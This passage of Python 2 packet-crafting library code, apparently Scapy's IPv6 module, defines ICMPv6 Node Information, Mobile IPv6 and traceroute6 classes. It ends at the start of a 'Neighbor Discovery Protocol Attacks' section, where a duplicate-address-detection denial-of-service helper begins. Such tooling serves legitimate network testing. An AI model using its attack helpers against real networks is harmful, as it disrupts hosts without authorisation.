x[:l]+"." x = x[l:] return res class NIQueryDataField(StrField): def __init__(self, name, default): StrField.__init__(self, name, default) def i2h(self, pkt, x): if x is None: return x t,val = x if t == 1: val = dnsrepr2names(val)[0] return val def h2i(self, pkt, x): if x is tuple and type(x[0]) is int: return x val = None try: # Try IPv6 inet_pton(socket.AF_INET6, x) val = (0, x) except: try: # Try IPv4 inet_pton(socket.AF_INET, x) val = (2, x) except: # Try DNS if x is None: x = "" x = names2dnsrepr(x) val = (1, x) return val def i2repr(self, pkt, x): t,val = x if t == 1: # DNS Name # we don't use dnsrepr2names() to deal with # possible weird data extracted info res = [] weird = None while val: l = ord(val[0]) val = val[1:] if l == 0: if (len(res) > 1 and val): # fqdn with data behind weird = val elif len(val) > 1: # single label with data behind weird = val[1:] break res.append(val[:l]+".") val = val[l:] tmp = "".join(res) if tmp and tmp[-1] == '.': tmp = tmp[:-1] return tmp return repr(val) def getfield(self, pkt, s): qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, "") else: code = getattr(pkt, "code") if code == 0: # IPv6 Addr return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) elif code == 2: # IPv4 Addr return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) else: # Name or Unknown return "", (1, s) def addfield(self, pkt, s, val): if ((type(val) is tuple and val[1] is None) or val is None): val = (1, "") t = val[0] if t == 1: return s + val[1] elif t == 0: return s + inet_pton(socket.AF_INET6, val[1]) else: return s + inet_pton(socket.AF_INET, val[1]) class NIQueryCodeField(ByteEnumField): def i2m(self, pkt, x): if x is None: d = pkt.getfieldval("data") if d is None: return 1 elif d[0] == 0: # IPv6 address return 0 elif d[0] == 1: # Name return 1 elif d[0] == 2: # IPv4 address return 2 else: return 1 return x _niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} #_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", # 8: "Link-local addresses", 16: "Site-local addresses", # 32: "Global addresses" } # "This NI type has no defined flags and never has a Data Field". Used # to know if the destination is up and implements NI protocol. class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Query - NOOP Query" fields_desc = [ ByteEnumField("type", 139, icmp6types), NIQueryCodeField("code", None, _niquery_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIQueryDataField("data", None) ] class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Name Query" qtype = 2 # We ask for the IPv6 address of the peer class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Address Query" qtype = 3 flags = 0x3E class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv4 Address Query" qtype = 4 _nireply_code = { 0: "Successful Reply", 1: "Response Refusal", 3: "Unknown query type" } _nireply_flags = { 1: "Reply set incomplete", 2: "All unicast addresses", 4: "IPv4 addresses", 8: "Link-local addresses", 16: "Site-local addresses", 32: "Global addresses" } # Internal repr is one of those : # (0, "some string") : unknow qtype value are mapped to that one # (3, [ (ttl, ip6), ... ]) # (4, [ (ttl, ip4), ... ]) # (2, [ttl, dns_names]) : dns_names is one string that contains # all the DNS names. Internally it is kept ready to be sent # (undissected). i2repr() decode it for user. This is to # make build after dissection bijective. # # I also merged getfield() and m2i(), and addfield() and i2m(). class NIReplyDataField(StrField): def i2h(self, pkt, x): if x is None: return x t,val = x if t == 2: ttl, dnsnames = val val = [ttl] + dnsrepr2names(dnsnames) return val def h2i(self, pkt, x): qtype = 0 # We will decode it as string if not # overridden through 'qtype' in pkt # No user hint, let's use 'qtype' value for that purpose if type(x) is not tuple: if pkt is not None: qtype = getattr(pkt, "qtype") else: qtype = x[0] x = x[1] # From that point on, x is the value (second element of the tuple) if qtype == 2: # DNS name if type(x) is str: # listify the string x = [x] if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0 x = [0] + x ttl = x[0] names = x[1:] return (2, [ttl, names2dnsrepr(names)]) elif qtype in [3, 4]: # IPv4 or IPv6 addr if type(x) is str: x = [x] # User directly provided an IP, instead of list # List elements are not tuples, user probably # omitted ttl value : we will use 0 instead def addttl(x): if type(x) is str: return (0, x) return x return (qtype, map(addttl, x)) return (qtype, x) def addfield(self, pkt, s, val): t,tmp = val if tmp is None: tmp = "" if t == 2: ttl,dnsstr = tmp return s+ struct.pack("!I", ttl) + dnsstr elif t == 3: return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp)) elif t == 4: return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp)) else: return s + tmp def getfield(self, pkt, s): code = getattr(pkt, "code") if code != 0: return s, (0, "") qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, "") elif qtype == 2: if len(s) < 4: return s, (0, "") ttl = struct.unpack("!I", s[:4])[0] return "", (2, [ttl, s[4:]]) elif qtype == 3: # IPv6 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 20: # 4 + 16 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET6, s[4:20]) res.append((ttl, ip)) s = s[20:] return s, (3, res) elif qtype == 4: # IPv4 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 8: # 4 + 4 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET, s[4:8]) res.append((ttl, ip)) s = s[8:] return s, (4, res) else: # XXX TODO : implement me and deal with real length return "", (0, s) def i2repr(self, pkt, x): if x is None: return "[]" if type(x) is tuple and len(x) == 2: t, val = x if t == 2: # DNS names ttl,l = val l = dnsrepr2names(l) return "ttl:%d %s" % (ttl, ", ".join(l)) elif t == 3 or t == 4: return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val))) return repr(val) return repr(x) # XXX should not happen # By default, sent responses have code set to 0 (successful) class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Reply - NOOP Reply" fields_desc = [ ByteEnumField("type", 140, icmp6types), ByteEnumField("code", 0, _nireply_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIReplyDataField("data", None)] class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Node Names" qtype = 2 class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv6 addresses" qtype = 3 class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv4 addresses" qtype = 4 class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" code = 1 class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" code = 2 def _niquery_guesser(p): cls = conf.raw_layer type = ord(p[0]) if type == 139: # Node Info Query specific stuff if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = { 0: ICMPv6NIQueryNOOP, 2: ICMPv6NIQueryName, 3: ICMPv6NIQueryIPv6, 4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer) elif type == 140: # Node Info Reply specific stuff code = ord(p[1]) if code == 0: if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = { 2: ICMPv6NIReplyName, 3: ICMPv6NIReplyIPv6, 4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP) elif code == 1: cls = ICMPv6NIReplyRefuse elif code == 2: cls = ICMPv6NIReplyUnknown return cls ############################################################################# ############################################################################# ### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ### ############################################################################# ############################################################################# # Mobile IPv6 ICMPv6 related classes class ICMPv6HAADRequest(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Request' fields_desc = [ ByteEnumField("type", 144, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15) ] def hashret(self): return struct.pack("!H",self.id)+self.payload.hashret() class ICMPv6HAADReply(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Reply' fields_desc = [ ByteEnumField("type", 145, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15), IP6ListField('addresses', None) ] def hashret(self): return struct.pack("!H",self.id)+self.payload.hashret() def answers(self, other): if not isinstance(other, ICMPv6HAADRequest): return 0 return self.id == other.id class ICMPv6MPSol(_ICMPv6): name = 'ICMPv6 Mobile Prefix Solicitation' fields_desc = [ ByteEnumField("type", 146, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), XShortField("res", 0) ] def _hashret(self): return struct.pack("!H",self.id) class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = 'ICMPv6 Mobile Prefix Advertisement' fields_desc = [ ByteEnumField("type", 147, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}), XBitField("res", 0, 14) ] def hashret(self): return struct.pack("!H",self.id) def answers(self, other): return isinstance(other, ICMPv6MPSol) # Mobile IPv6 Options classes _mobopttypes = { 2: "Binding Refresh Advice", 3: "Alternate Care-of Address", 4: "Nonce Indices", 5: "Binding Authorization Data", 6: "Mobile Network Prefix (RFC3963)", 7: "Link-Layer Address (RFC4068)", 8: "Mobile Node Identifier (RFC4283)", 9: "Mobility Message Authentication (RFC4285)", 10: "Replay Protection (RFC4285)", 11: "CGA Parameters Request (RFC4866)", 12: "CGA Parameters (RFC4866)", 13: "Signature (RFC4866)", 14: "Home Keygen Token (RFC4866)", 15: "Care-of Test Init (RFC4866)", 16: "Care-of Test (RFC4866)" } class _MIP6OptAlign: """ Mobile IPv6 options have alignment requirements of the form x*n+y. This class is inherited by all MIPv6 options to help in computing the required Padding for that option, i.e. the need for a Pad1 or PadN option before it. They only need to provide x and y as class parameters. (x=0 and y=0 are used when no alignment is required)""" def alignment_delta(self, curpos): x = self.x ; y = self.y if x == 0 and y ==0: return 0 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta class MIP6OptBRAdvice(_MIP6OptAlign, Packet): name = 'Mobile IPv6 Option - Binding Refresh Advice' fields_desc = [ ByteEnumField('otype', 2, _mobopttypes), ByteField('olen', 2), ShortField('rinter', 0) ] x = 2 ; y = 0# alignment requirement: 2n class MIP6OptAltCoA(_MIP6OptAlign, Packet): name = 'MIPv6 Option - Alternate Care-of Address' fields_desc = [ ByteEnumField('otype', 3, _mobopttypes), ByteField('olen', 16), IP6Field("acoa", "::") ] x = 8 ; y = 6 # alignment requirement: 8n+6 class MIP6OptNonceIndices(_MIP6OptAlign, Packet): name = 'MIPv6 Option - Nonce Indices' fields_desc = [ ByteEnumField('otype', 4, _mobopttypes), ByteField('olen', 16), ShortField('hni', 0), ShortField('coni', 0) ] x = 2 ; y = 0 # alignment requirement: 2n class MIP6OptBindingAuthData(_MIP6OptAlign, Packet): name = 'MIPv6 Option - Binding Authorization Data' fields_desc = [ ByteEnumField('otype', 5, _mobopttypes), ByteField('olen', 16), BitField('authenticator', 0, 96) ] x = 8 ; y = 2 # alignment requirement: 8n+2 class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963 name = 'NEMO Option - Mobile Network Prefix' fields_desc = [ ByteEnumField("otype", 6, _mobopttypes), ByteField("olen", 18), ByteField("reserved", 0), ByteField("plen", 64), IP6Field("prefix", "::") ] x = 8 ; y = 4 # alignment requirement: 8n+4 class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" fields_desc = [ ByteEnumField("otype", 7, _mobopttypes), ByteField("olen", 7), ByteEnumField("ocode", 2, _rfc4068_lla_optcode), ByteField("pad", 0), MACField("lla", ETHER_ANY) ] # Only support ethernet x = 0 ; y = 0 # alignment requirement: none class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283 name = "MIPv6 Option - Mobile Node Identifier" fields_desc = [ ByteEnumField("otype", 8, _mobopttypes), FieldLenField("olen", None, length_of="id", fmt="B", adjust = lambda pkt,x: x+1), ByteEnumField("subtype", 1, {1: "NAI"}), StrLenField("id", "", length_from = lambda pkt: pkt.olen-1) ] x = 0 ; y = 0 # alignment requirement: none # We only support decoding and basic build. Automatic HMAC computation is # too much work for our current needs. It is left to the user (I mean ... # you). --arno class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5) name = "MIPv6 Option - Mobility Message Authentication" fields_desc = [ ByteEnumField("otype", 9, _mobopttypes), FieldLenField("olen", None, length_of="authdata", fmt="B", adjust = lambda pkt,x: x+5), ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", 2: "MN-AAA authentication mobility option"}), IntField("mspi", None), StrLenField("authdata", "A"*12, length_from = lambda pkt: pkt.olen-5) ] x = 4 ; y = 1 # alignment requirement: 4n+1 # Extracted from RFC 1305 (NTP) : # NTP timestamps are represented as a 64-bit unsigned fixed-point number, # in seconds relative to 0h on 1 January 1900. The integer part is in the # first 32 bits and the fraction part in the last 32 bits. class NTPTimestampField(LongField): epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0) def i2repr(self, pkt, x): if x < ((50*31536000)<<32): return "Some date a few decades ago (%d)" % x # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to # January 1st 1970 : delta = -2209075761 i = int(x >> 32) j = float(x & 0xffffffff) * 2.0**-32 res = i + j + delta from time import strftime t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res)) return "%s (%d)" % (t, x) class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6) name = "MIPv6 option - Replay Protection" fields_desc = [ ByteEnumField("otype", 10, _mobopttypes), ByteField("olen", 8), NTPTimestampField("timestamp", 0) ] x = 8 ; y = 2 # alignment requirement: 8n+2 class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6) name = "MIPv6 option - CGA Parameters Request" fields_desc = [ ByteEnumField("otype", 11, _mobopttypes), ByteField("olen", 0) ] x = 0 ; y = 0 # alignment requirement: none # XXX TODO: deal with CGA param fragmentation and build of defragmented # XXX version. Passing of a big CGAParam structure should be # XXX simplified. Make it hold packets, by the way --arno class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1) name = "MIPv6 option - CGA Parameters" fields_desc = [ ByteEnumField("otype", 12, _mobopttypes), FieldLenField("olen", None, length_of="cgaparams", fmt="B"), StrLenField("cgaparams", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2) name = "MIPv6 option - Signature" fields_desc = [ ByteEnumField("otype", 13, _mobopttypes), FieldLenField("olen", None, length_of="sig", fmt="B"), StrLenField("sig", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3) name = "MIPv6 option - Home Keygen Token" fields_desc = [ ByteEnumField("otype", 14, _mobopttypes), FieldLenField("olen", None, length_of="hkt", fmt="B"), StrLenField("hkt", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4) name = "MIPv6 option - Care-of Test Init" fields_desc = [ ByteEnumField("otype", 15, _mobopttypes), ByteField("olen", 0) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5) name = "MIPv6 option - Care-of Test" fields_desc = [ ByteEnumField("otype", 16, _mobopttypes), FieldLenField("olen", None, length_of="cokt", fmt="B"), StrLenField("cokt", '\x00'*8, length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptUnknown(_MIP6OptAlign, Packet): name = 'Scapy6 - Unknown Mobility Option' fields_desc = [ ByteEnumField("otype", 6, _mobopttypes), FieldLenField("olen", None, length_of="odata", fmt="B"), StrLenField("odata", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none moboptcls = { 0: Pad1, 1: PadN, 2: MIP6OptBRAdvice, 3: MIP6OptAltCoA, 4: MIP6OptNonceIndices, 5: MIP6OptBindingAuthData, 6: MIP6OptMobNetPrefix, 7: MIP6OptLLAddr, 8: MIP6OptMNID, 9: MIP6OptMsgAuth, 10: MIP6OptReplayProtection, 11: MIP6OptCGAParamsReq, 12: MIP6OptCGAParams, 13: MIP6OptSignature, 14: MIP6OptHomeKeygenToken, 15: MIP6OptCareOfTestInit, 16: MIP6OptCareOfTest } # Main Mobile IPv6 Classes mhtypes = { 0: 'BRR', 1: 'HoTI', 2: 'CoTI', 3: 'HoT', 4: 'CoT', 5: 'BU', 6: 'BA', 7: 'BE', 8: 'Fast BU', 9: 'Fast BA', 10: 'Fast NA' } # From http://www.iana.org/assignments/mobility-parameters bastatus = { 0: 'Binding Update accepted', 1: 'Accepted but prefix discovery necessary', 128: 'Reason unspecified', 129: 'Administratively prohibited', 130: 'Insufficient resources', 131: 'Home registration not supported', 132: 'Not home subnet', 133: 'Not home agent for this mobile node', 134: 'Duplicate Address Detection failed', 135: 'Sequence number out of window', 136: 'Expired home nonce index', 137: 'Expired care-of nonce index', 138: 'Expired nonces', 139: 'Registration type change disallowed', 140: 'Mobile Router Operation not permitted', 141: 'Invalid Prefix', 142: 'Not Authorized for Prefix', 143: 'Forwarding Setup failed (prefixes missing)', 144: 'MIPV6-ID-MISMATCH', 145: 'MIPV6-MESG-ID-REQD', 146: 'MIPV6-AUTH-FAIL', 147: 'Permanent home keygen token unavailable', 148: 'CGA and signature verification failed', 149: 'Permanent home keygen token exists', 150: 'Non-null home nonce index expected' } class _MobilityHeader(Packet): name = 'Dummy IPv6 Mobility Header' overload_fields = { IPv6: { "nh": 135 }} def post_build(self, p, pay): p += pay l = self.len if self.len is None: l = (len(p)-8)/8 p = p[0] + struct.pack("B", l) + p[2:] if self.cksum is None: cksum = in6_chksum(135, self.underlayer, p) else: cksum = self.cksum p = p[:4]+struct.pack("!H", cksum)+p[6:] return p class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg name = "IPv6 Mobility Header - Generic Message" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", None, mhtypes), ByteField("res", None), XShortField("cksum", None), StrLenField("msg", "\x00"*2, length_from = lambda pkt: 8*pkt.len-6) ] # TODO: make a generic _OptionsField class _MobilityOptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, count_from=None, length_from=None): self.curpos = curpos PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from) def getfield(self, pkt, s): l = self.length_from(pkt) return s[l:],self.m2i(pkt, s[:l]) def i2len(self, pkt, i): return len(self.i2m(pkt, i)) def m2i(self, pkt, x): opt = [] while x: o = ord(x[0]) # Option type cls = self.cls if moboptcls.has_key(o): cls = moboptcls[o] try: op = cls(x) except: op = self.cls(x) opt.append(op) if isinstance(op.payload, conf.raw_layer): x = op.payload.load del(op.payload) else: x = "" return opt def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except: autopad = 1 if not autopad: return "".join(map(str, x)) curpos = self.curpos s = "" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) pstr = str(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) return s def addfield(self, pkt, s, val): return s+self.i2m(pkt, val) class MIP6MH_BRR(_MobilityHeader): name = "IPv6 Mobility Header - Binding Refresh Request" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 0, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("res2", None), _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 8, length_from = lambda pkt: 8*pkt.len) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): # Hack: BRR, BU and BA have the same hashret that returns the same # value "\x00\x08\x09" (concatenation of mhtypes). This is # because we need match BA with BU and BU with BRR. --arno return "\x00\x08\x09" class MIP6MH_HoTI(_MobilityHeader): name = "IPv6 Mobility Header - Home Test Init" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 1, mhtypes), ByteField("res", None), XShortField("cksum", None), StrFixedLenField("reserved", "\x00"*2, 2), StrFixedLenField("cookie", "\x00"*8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 16, length_from = lambda pkt: 8*(pkt.len-1)) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): return self.cookie class MIP6MH_CoTI(MIP6MH_HoTI): name = "IPv6 Mobility Header - Care-of Test Init" mhtype = 2 def hashret(self): return self.cookie class MIP6MH_HoT(_MobilityHeader): name = "IPv6 Mobility Header - Home Test" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 3, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("index", None), StrFixedLenField("cookie", "\x00"*8, 8), StrFixedLenField("token", "\x00"*8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 24, length_from = lambda pkt: 8*(pkt.len-2)) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): return self.cookie def answers(self): if (isinstance(other, MIP6MH_HoTI) and self.cookie == other.cookie): return 1 return 0 class MIP6MH_CoT(MIP6MH_HoT): name = "IPv6 Mobility Header - Care-of Test" mhtype = 4 def hashret(self): return self.cookie def answers(self): if (isinstance(other, MIP6MH_CoTI) and self.cookie == other.cookie): return 1 return 0 class LifetimeField(ShortField): def i2repr(self, pkt, x): return "%d sec" % (4*x) class MIP6MH_BU(_MobilityHeader): name = "IPv6 Mobility Header - Binding Update" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) ByteEnumField("mhtype", 5, mhtypes), ByteField("res", None), XShortField("cksum", None), XShortField("seq", None), # TODO: ShortNonceField FlagsField("flags", "KHA", 7, "PRMKLHA"), XBitField("reserved", 0, 9), LifetimeField("mhtime", 3), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 12, length_from = lambda pkt: 8*pkt.len - 4) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return "\x00\x08\x09" def answers(self, other): if isinstance(other, MIP6MH_BRR): return 1 return 0 class MIP6MH_BA(_MobilityHeader): name = "IPv6 Mobility Header - Binding ACK" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) ByteEnumField("mhtype", 6, mhtypes), ByteField("res", None), XShortField("cksum", None), ByteEnumField("status", 0, bastatus), FlagsField("flags", "K", 3, "PRK"), XBitField("res2", None, 5), XShortField("seq", None), # TODO: ShortNonceField XShortField("mhtime", 0), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 12, length_from = lambda pkt: 8*pkt.len-4) ] overload_fields = { IPv6: { "nh": 135 }} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return "\x00\x08\x09" def answers(self, other): if (isinstance(other, MIP6MH_BU) and other.mhtype == 5 and self.mhtype == 6 and other.flags & 0x1 and # Ack request flags is set self.seq == other.seq): return 1 return 0 _bestatus = { 1: 'Unknown binding for Home Address destination option', 2: 'Unrecognized MH Type value' } # TODO: match Binding Error to its stimulus class MIP6MH_BE(_MobilityHeader): name = "IPv6 Mobility Header - Binding Error" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) ByteEnumField("mhtype", 7, mhtypes), ByteField("res", 0), XShortField("cksum", None), ByteEnumField("status", 0, _bestatus), ByteField("reserved", 0), IP6Field("ha", "::"), _MobilityOptionsField("options", [], MIP6OptUnknown, 24, length_from = lambda pkt: 8*(pkt.len-2)) ] overload_fields = { IPv6: { "nh": 135 }} _mip6_mhtype2cls = { 0: MIP6MH_BRR, 1: MIP6MH_HoTI, 2: MIP6MH_CoTI, 3: MIP6MH_HoT, 4: MIP6MH_CoT, 5: MIP6MH_BU, 6: MIP6MH_BA, 7: MIP6MH_BE } ############################################################################# ############################################################################# ### Traceroute6 ### ############################################################################# ############################################################################# class AS_resolver6(AS_resolver_riswhois): def _resolve_one(self, ip): """ overloaded version to provide a Whois resolution on the embedded IPv4 address if the address is 6to4 or Teredo. Otherwise, the native IPv6 address is passed. """ if in6_isaddr6to4(ip): # for 6to4, use embedded @ tmp = inet_pton(socket.AF_INET6, ip) addr = inet_ntop(socket.AF_INET, tmp[2:6]) elif in6_isaddrTeredo(ip): # for Teredo, use mapped address addr = teredoAddrExtractInfo(ip)[2] else: addr = ip _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) return ip,asn,desc class TracerouteResult6(TracerouteResult): __slots__ = [] def show(self): return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! s.hlim, r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+ "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+ "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+ "{ICMPv6EchoReply:%ir,type%}"))) def get_trace(self): trace = {} for s,r in self.res: if IPv6 not in s: continue d = s[IPv6].dst if d not in trace: trace[d] = {} t = not (ICMPv6TimeExceeded in r or ICMPv6DestUnreach in r or ICMPv6PacketTooBig in r or ICMPv6ParamProblem in r) trace[d][s[IPv6].hlim] = r[IPv6].src, t for k in trace.itervalues(): try: m = min(x for x, y in k.itervalues() if y[1]) except ValueError: continue for l in k.keys(): # use .keys(): k is modified in the loop if l > m: del k[l] return trace def graph(self, ASres=AS_resolver6(), **kargs): TracerouteResult.graph(self, ASres=ASres, **kargs) def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), l4 = None, timeout=2, verbose=None, **kargs): """ Instant TCP traceroute using IPv6 : traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None """ if verbose is None: verbose = conf.verb if l4 is None: a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport), timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) else: a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4, timeout=timeout, verbose=verbose, **kargs) a = TracerouteResult6(a.res) if verbose: a.display() return a,b ############################################################################# ############################################################################# ### Sockets ### ############################################################################# ############################################################################# class L3RawSocket6(L3RawSocket): def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): L3RawSocket.__init__(self, type, filter, iface, promisc) # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) def IPv6inIP(dst='203.178.135.36', src=None): _IPv6inIP.dst = dst _IPv6inIP.src = src if not conf.L3socket == _IPv6inIP: _IPv6inIP.cls = conf.L3socket else: del(conf.L3socket) return _IPv6inIP class _IPv6inIP(SuperSocket): dst = '127.0.0.1' src = None cls = None def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): SuperSocket.__init__(self, family, type, proto) self.worker = self.cls(**args) def set(self, dst, src=None): _IPv6inIP.src = src _IPv6inIP.dst = dst def nonblock_recv(self): p = self.worker.nonblock_recv() return self._recv(p) def recv(self, x): p = self.worker.recv(x) return self._recv(p, x) def _recv(self, p, x=MTU): if p is None: return p elif isinstance(p, IP): # TODO: verify checksum if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: if isinstance(p.payload, IPv6): return p.payload return p def send(self, x): return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x) ############################################################################# ############################################################################# ### Neighbor Discovery Protocol Attacks ### ############################################################################# ############################################################################# def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Internal generic helper accepting a specific callback as first argument, for NS or NA reply. See the two specific functions below. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and 